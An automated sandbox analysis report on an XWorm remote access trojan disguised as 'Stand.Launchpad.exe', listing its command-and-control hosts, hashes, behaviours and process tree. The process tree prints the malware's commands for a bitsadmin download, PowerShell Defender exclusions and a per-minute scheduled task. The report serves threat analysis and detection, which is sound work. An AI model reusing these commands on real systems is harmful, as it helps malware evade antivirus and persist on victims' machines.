Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    31-05-2024 04:12

General

  • Target
    Stand.Launchpad.exe
  • Size
    140KB
  • MD5
    bec01d16b6f3c443eb3912042c1fc7f9
  • SHA1
    436c7fabff54997f2e550754edea0ae791080c9b
  • SHA256
    2aa6b748a1ee67ba3f68a53228bbc14ed8ce1285e1dde54d310e2ca8797eb779
  • SHA512
    4101f563c479a22883a024cbd9ba9d5a46234a237471b14853a82263e96f0ac74eb101dd77a71aab98101c8cb1c9c15ed987a45b3540d300c6bb740b707b27e1
  • SSDEEP
    3072:J5XMHZjqrraIh3GGKt6cGuPN1OHXFhTVR7NetgV:H85jqrWIhGlN1sVhTwtg

Malware Config

Extracted

  • Family
    xworm
  • C2
    127.0.0.1:40971
    us3.localto.net:40971
    Name1442-40971.portmap.host:40971
  • Attributes
    • Install_directory
      %Temp%
    • install_file
      Stand.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe
    "C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4948
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3284
      • C:\Windows\SysWOW64\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\Stand.exe
        3⤵
        • Download via BitsAdmin
        PID:4064
      • C:\Users\Admin\AppData\Local\Temp\Stand.exe
        "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2412
    • C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe
      "C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3272
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2336
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.Launchpad.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2276
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3560
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2996
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
        3⤵
        • Creates scheduled task(s)
        PID:2172
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4076 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
    1⤵
    PID:1544
  • C:\Users\Admin\AppData\Local\Temp\Stand.exe
    C:\Users\Admin\AppData\Local\Temp\Stand.exe
    1⤵
    PID:1844

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Stand.Launchpad.exe.log
    Filesize: 654B
    MD5: 2ff39f6c7249774be85fd60a8f9a245e
    SHA1: 684ff36b31aedc1e587c8496c02722c6698c1c4e
    SHA256: e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
    SHA512: 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5: d85ba6ff808d9e5444a4b369f5bc2730
    SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
    SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
    SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5: d28a889fd956d5cb3accfbaf1143eb6f
    SHA1: 157ba54b365341f8ff06707d996b3635da8446f7
    SHA256: 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
    SHA512: 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5: 7a451cd1316d70a65910773fee8c3a43
    SHA1: d2db32d5037153dd1d94565b51b5b385817a3c3d
    SHA256: 862d25ed22075f3d1f5e8d29a3c6e050dc91e53a4dc653c3f0f7c627a12ee26c
    SHA512: 60887f795036fbd6d25234c17dab4463a8a02f576ae8c07dd7b4c4ff1dba35f99b7301139ea051a7a80fdfc9e003a2f0c2dd0d444a82ecf87a3df21507332aa6
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5: cdf113430dd2b0560c16a4927250105c
    SHA1: d6d8ec180136a243cfba776439f1a5a303cdb18a
    SHA256: 0fe47567ce2c2aee76f3a3befe6491b540b1367a2b4d9cdacdf5f7eea981a93d
    SHA512: 968843bd781bf4a65d9c973b2bc7d576c7b5cb8585fe97c5082039f97b28659f7a4fa0cce654c6f1cf121631fa04de059c186aff30bdd98c19b86f358b000bfd
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ogc3ghue.rhm.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Admin\AppData\Roaming\Downloader.hta
    Filesize: 893B
    MD5: b0a6d4e05dc2225dd03902a3061a4041
    SHA1: 39c500eefbf78d7d51768edb6983c361213cb7b8
    SHA256: 05e5c927c6366bebab2fb341d233887f503fb692d8f6880f7d1327b64705c1ee
    SHA512: 96fb1e3046a0daddd6a17a38fcfa8ad6e00f8c4950cc7e46c8a79b24817b2f271229d15facaa510105d3c95234a9f095fdf8ff8bbb8099c47565bd955c316918
  • C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe
    Filesize: 108KB
    MD5: d51da3fa31165f2536dddad44974af34
    SHA1: 703a62d92fbfe23611297715ca50bb82b4ff55a1
    SHA256: 9cc68d4ab822bd8e5fd66f40b2c99bce04805505e593027aca67256ab63c6210
    SHA512: 3adfaf5e251d974a9d576c71e51e3b1c59ddee2feecf281801166cf9448a3e51e6066737c06bee20089721630f4016f16ae7297061112cb23f2fe786386e4197
  • memory/2336-21-0x000001BA3D500000-0x000001BA3D522000-memory.dmp
    Filesize: 136KB
  • memory/2412-73-0x000001C5E2030000-0x000001C5E2046000-memory.dmp
    Filesize: 88KB
  • memory/3272-20-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp
    Filesize: 10.8MB
  • memory/3272-18-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp
    Filesize: 10.8MB
  • memory/3272-17-0x0000000000900000-0x0000000000920000-memory.dmp
    Filesize: 128KB
  • memory/3272-71-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp
    Filesize: 10.8MB
  • memory/3272-72-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp
    Filesize: 10.8MB
  • memory/4948-0-0x00007FF9EA913000-0x00007FF9EA915000-memory.dmp
    Filesize: 8KB
  • memory/4948-1-0x0000000000F40000-0x0000000000F68000-memory.dmp
    Filesize: 160KB